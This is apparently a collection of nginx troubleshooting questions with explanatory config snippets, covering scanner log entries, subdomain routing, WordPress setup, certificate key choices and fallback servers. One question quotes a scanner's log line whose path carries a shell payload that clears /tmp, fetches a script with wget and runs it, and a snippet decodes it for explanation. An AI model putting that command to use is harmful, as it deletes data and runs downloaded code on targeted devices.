Weird GET request on internet facing Nginx

I spun up an internet-facing nginx server in AWS, and the logs started showing strange GET requests with a search engine's spider as the user agent:

    - - [19/Aug/2020:20:09:19 +0000] "GET /rexcategory?categoryCodes=SHPCAT33&t=1360657001168 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+" ""

    2020/08/19 20:08:39 [error] 29#29: *14 open() "/usr/share/nginx/html/eyloyrewards/category" failed (2: No such file or directory), client:, server: localhost, request: "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1", host: ""

    - - [19/Aug/2020:20:08:39 +0000] "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+" ""

The domain mentioned in the second line does not belong to me. What do these logs mean? Is my server being used to attack the mentioned domain, "" ?
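Requests like these typically come from scanners that spray every reachable address with arbitrary Host headers and paths. One common mitigation, sketched below as an assumption (this catch-all block is not part of the original config), is a default server that drops any request whose Host header matches none of the sites you actually serve:

```nginx
# Catch-all default server: requests with an unknown or empty Host header
# land here instead of in a real site's server block.
server {
    listen 80 default_server;
    server_name _;
    return 444;   # nginx-specific: close the connection without sending a reply
}
```

With this in place, scanner probes for foreign domains no longer reach (or get logged against) your real sites.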

Nginx not able to serve subdomain on same server as domain

On my nginx server (Ubuntu 18.04), I want to host and, where is one index.html file and is a proxy to my Node.js API, which runs on port 3001.

I have two files in the /etc/nginx/sites-available folder, called and, with the following contents.

    # first file
    server {
        listen 80;
        listen [::]:80;

        root /var/www/;
        index index.html;

        server_name;

        location / {
            try_files $uri $uri/ =404;
        }
    }

    # second file
    upstream domain_apis {
        server;
        keepalive 64;
    }

    server {
        listen 80;
        server_name;

        location / {
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header Host $http_host;

            proxy_http_version 1.1;
            proxy_set_header Upgrade $http_upgrade;
            proxy_set_header Connection "upgrade";

            proxy_pass http://domain_apis/;
            proxy_redirect off;
            proxy_read_timeout 240s;
        }
    }

(Note: the original was missing the semicolon after `index index.html`, which would make nginx swallow the following `server_name` directive as arguments to `index`.)

When I hit, things work fine. But when I hit, it serves the page from the root folder. I have replaced the reverse proxy with a simple server on another subdomain, but it always serves the root domain.

Any ideas on how to debug this, and how to check whether requests are hitting the correct server block?
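Worth noting: when no `server_name` matches the request's Host header, nginx falls back to the default server for that port (the first block defined, unless one is marked `default_server`), which matches the symptom described. One way to see which block answers is to tag each one with a response header (a sketch; the header name, values, and `sub.example.com` domain are placeholders, not from the original config):

```nginx
# Inside the root-domain server block:
add_header X-Debug-Block "apex" always;
# Inside the subdomain server block, the same directive with a different value:
#   add_header X-Debug-Block "api" always;
#
# Then check which block answered, bypassing DNS with curl's --resolve:
#   curl -sI --resolve sub.example.com:80:127.0.0.1 http://sub.example.com/
#
# Also confirm both vhost files are actually loaded and their server_name
# values are what you expect:
#   nginx -T | grep -n server_name
```

If the header always comes back as "apex", the subdomain's `server_name` is not matching and nginx is defaulting to the first block.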

Nginx main domain overwriting subdomains

I have an Nginx server running a website, and I’d like to add a new host under a subdomain of the main domain.

However as the title suggests, the subdomain’s host seems to get ignored, and replaced by the main domain regardless.

Am I correct in assuming that the following directives, each in their own server block:

    server_name;
    server_name;

will always go to ?
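For reference, nginx selects a server block by matching the request's Host header against each block's `server_name`; the matching block wins regardless of definition order. A minimal sketch with placeholder domains (example.com and sub.example.com are assumptions, not the poster's names):

```nginx
# nginx matches the Host header against server_name; an exact match on the
# subdomain's name routes the request to the second block, independent of
# the order in which the blocks appear.
server {
    listen 80;
    server_name example.com;
    return 200 "apex\n";
}

server {
    listen 80;
    server_name sub.example.com;
    return 200 "subdomain\n";
}
```

If the subdomain block is being ignored, the usual culprits are a wrong or missing `server_name`, the file not being linked into sites-enabled, or nginx not having been reloaded.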

Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

    - - "GET /shell?cd+/tmp;rm+-rf+*;wget+;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
    - - "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
    - - "GET / HTTP/1.1" 400 157 "-" "-"
    - - "GET / HTTP/1.1" 400 157 "-" "-"

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell from these entries which specific exploit was attempted?
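To make the payload readable: the `+` signs in the request path are URL-encoded spaces, so decoding the path from the first log line above shows the shell command the scanner hoped some vulnerable device would execute (the command is only printed here, never run):

```shell
# Sample request path copied from the log above; decode '+' back to spaces
# to reveal the intended shell payload. (The wget URL was stripped from the
# original log excerpt, hence the gap after 'wget'.)
req='/shell?cd+/tmp;rm+-rf+*;wget+;sh+/tmp/jaws'
decoded=$(printf '%s\n' "$req" | tr '+' ' ')
echo "$decoded"
```

The scanner is not targeting nginx itself: it sprays this request at every web server it finds, hoping to hit devices whose embedded HTTP server does expose a `/shell` endpoint.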

Why can’t I connect to the wordpress install page with Nginx?

I’m a newbie with WordPress. My environment is Ubuntu 18 + Nginx + PHP 7.

Following the tutorial (, the WordPress directory was placed in /var/www/html/.

Then I configured nginx; here is my nginx config:

    server {
        listen 80;
        server_name;
        server_name;

        root /var/www/html/;
        index index.php;

        # log files
        access_log /var/log/nginx/;
        error_log /var/log/nginx/;

        location = /favicon.ico {
            log_not_found off;
            access_log off;
        }

        location = /robots.txt {
            allow all;
            log_not_found off;
            access_log off;
        }

        location / {
            try_files $uri $uri/ /index.php?$args;
        }

        location ~ \.php$ {
            include snippets/fastcgi-php.conf;
            fastcgi_pass unix:/run/php/php7.2-fpm.sock;
        }

        location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ {
            expires max;
            log_not_found off;
        }
    }

But when I try to connect, Nginx responds with 404 instead of returning the WordPress install page.

I don’t have any idea how to investigate the issue. Thanks for your suggestions.
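One way to narrow down a 404 like this (a sketch, assuming you can edit the server block; the log path is a placeholder) is to raise the error log to debug level and watch which location block and file path nginx actually resolves:

```nginx
# Inside the server block: debug-level logging traces server/location
# matching and each try_files attempt, so you can see exactly which
# path nginx looked for before returning 404.
error_log /var/log/nginx/wp-debug.log debug;

# Then reload and watch while reproducing the request:
#   nginx -t && nginx -s reload
#   tail -f /var/log/nginx/wp-debug.log
#
# Also verify the files nginx expects actually exist and are readable:
#   ls -l /var/www/html/index.php
```

If the debug log shows nginx probing a path that doesn't exist on disk, the mismatch is between `root` and where WordPress was actually unpacked.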

Algorithm and key size to choose for SSL certificates (security and CPU wise) in 2020 (using nginx)

I posted this question already on SO, but as it is not really a programming question, I thought this might be a better place to ask:

I want to set up a new SSL certificate store for generating SSL certs: server certs (nginx) and client certs (Linux/Windows devices).

I’ve been searching for quite some time and I’m not sure I fully understand, especially as some articles are a few years old.

Many articles just talk about RSA and seem to recommend 2048 or 3072 bits, though mentioning that 2048 is today probably still the best choice ( ).

I found, for example, one article ( ), but it seems to talk mostly about key encryption, as @dave_thompson_085 pointed out on SO,

stating in the section “Asymmetric (“Public Key”) Encryption”:

    Use, in order of preference:
        X25519 (for which the key size never changes) then symmetric encryption.
        ECDH with secp256r1 (for which the key size never changes) then symmetric encryption.
        RSA with 2048-bit keys.

    The security of a 256-bit elliptic curve cryptography key is about even with 3072-bit RSA.
    Although many organizations are recommending migrating from 2048-bit RSA to 3072-bit RSA
    (or even 4096-bit RSA) in the coming years, don't follow that recommendation. Instead
    migrate from RSA to elliptic curve cryptography, and then breathe easy while you keep an
    eye out for post-quantum cryptography recommendations.

However, they don’t mention the impact on server CPU usage compared to RSA 2048/3072/4096. I also didn’t find many other articles suggesting a switch to elliptic-curve algorithms.

Another article ( ) tries to promote ECC instead of RSA, but comments on the article state that ECC is less safe than RSA if quantum computers kick in, and the article nowhere cites numbers for what performance improvement to expect when using ECC. It also mentions potential legal issues and fear of being sued.

Though CPU usage is not a major issue, I’d still like to get some idea, as I’d like to use the same CA and cert store on devices like Raspberry Pis.

So what is today the best choice of certificate key algorithm and key size for server certs (old Internet Explorer support is not required, but PCs, tablets, and mobile phones in use today should be able to connect to the server),

and what’s the best choice for client certs (which will not be used on mobile devices)?

I kind of tend toward RSA 2048, but I’m really not sure I’m interpreting all the articles correctly, and I don’t like making choices based on feelings.
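For getting concrete numbers rather than feelings, a minimal sketch assuming a stock OpenSSL install (file names are placeholders): generate the two candidate key types and benchmark them on the actual hardware, e.g. the Raspberry Pi in question:

```shell
# ECDSA P-256 key: roughly the security level of 3072-bit RSA, with much
# cheaper signing on the server side.
openssl ecparam -name prime256v1 -genkey -noout -out server-ec.key

# RSA-2048 key for comparison.
openssl genrsa -out server-rsa.key 2048

# To measure the CPU cost of each on your own machine, compare the
# signatures-per-second numbers reported by:
#   openssl speed rsa2048 ecdsap256
```

Running `openssl speed` on each target device answers the CPU question directly, since the RSA/ECDSA gap varies a lot between a server CPU and a Raspberry Pi.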

Location directive is not working correctly nginx

I am trying to serve my index.php file from a sub-path, for example:

The root folder is:


The URL a user will use to get to this root folder is:

Every time I use this location declaration, I get a 404 or Forbidden message:

    location /server/client/ {
        alias /path/to/my/root/folder;
        try_files $uri $uri/ /index.php$uri$is_args$args;
    }

I just cannot…
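One likely cause worth checking: combining `try_files` with `alias` is a long-standing nginx quirk; the fallback argument is resolved in a way that often produces 404s inside aliased locations. A common workaround, sketched here with placeholder paths (adjust to the real layout), is to use `root` instead of `alias` when the on-disk directory structure can mirror the URL path:

```nginx
# Placeholder paths. With root, the full URI is appended to the root path,
# so /server/client/foo maps to /path/to/my/server/client/foo, and
# try_files behaves predictably (unlike with alias).
location /server/client/ {
    root /path/to/my;
    try_files $uri $uri/ /server/client/index.php$is_args$args;
}
```

If the directory layout can't be rearranged to match, another option is to keep `alias` but replace `try_files` with an explicit `index` plus a separate PHP location.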


Add Failthrough server of a LAN IP to Nginx?

I’m trying to add my machine’s LAN IP as a “failthrough” (fallback) location to use in the event the main server has issues.

Lately, my main server name (i.e. has been having some issues due to Let’s Encrypt cert problems, so any URL running on my server using that domain name fails as well. What I want is for Nginx to automatically pass requests to the machine’s IP instead if it detects that the domain name itself is down.

I’m using the Docker LinuxServer LetsEncrypt container, and I’ve tried just adding the IP to the server_name variable in the config, but after restarting the container, nothing appears to change when trying to navigate to (it still just gives the same error page instead of redirecting to the IP).

Here’s the current config with the issue:

    server {
        listen 443 ssl http2 default_server;

        root /config/www;
        index index.php index.html index.htm;

        server_name myserver.*;

        # enable subfolder method reverse proxy confs
        include /config/nginx/proxy-confs/*.subfolder.conf;

        # Tell search engines not to crawl/add this domain
        add_header X-Robots-Tag "noindex, nofollow, nosnippet, noarchive";

        # all ssl related config moved to ssl.conf
        include /config/nginx/ssl.conf;

        # enable for ldap auth
        #include /config/nginx/ldap.conf;

        client_max_body_size 0;

        location ~ \.php$ {
            fastcgi_split_path_info ^(.+\.php)(/.+)$;
            fastcgi_pass;
            fastcgi_index index.php;
            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
            include /etc/nginx/fastcgi_params;
        }
    }

Note this line in particular; the IP as the second server is the intended failthrough IP:

server_name myserver.*;

Also note: if I just use directly in a browser, it navigates to the intended page fine, so this has to be something config-wise with Nginx. It seems like a pretty simple issue, but I’m not super familiar with Nginx config nuances yet.
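One thing to be aware of: `server_name` only decides which block handles an incoming request; it provides no failover between addresses. Fallback behavior of this kind is normally expressed with an `upstream` containing a `backup` server. A sketch with placeholder names and addresses (not from the original config):

```nginx
# Placeholder hostname and LAN IP. nginx sends traffic to the primary and
# switches to the backup only when the primary is considered unavailable
# (connection errors/timeouts, per proxy_next_upstream defaults).
upstream fallback_demo {
    server myserver.example.com:443;
    server 192.168.1.50:443 backup;   # used only while the primary is down
}

server {
    listen 8443 ssl;
    location / {
        proxy_pass https://fallback_demo;
    }
}
```

Note this won't help with the certificate problem itself: the browser still validates the cert for the name it requested, so a failed Let's Encrypt renewal will warn regardless of which backend served the response.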